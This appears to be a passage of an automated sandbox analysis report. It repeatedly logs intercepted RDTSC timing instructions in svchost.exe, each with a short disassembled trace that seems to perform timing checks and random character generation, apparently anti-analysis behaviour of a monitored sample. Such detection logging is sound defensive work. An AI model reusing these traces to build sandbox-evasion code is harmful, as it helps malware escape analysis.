Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59550h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA597D3h 0x00000033 call 2AA4FEB6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FBF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59810h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594F3h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FEB6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA597D3h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59490h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59513h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA591D0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59835h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEB6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59810h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59804h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59150h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
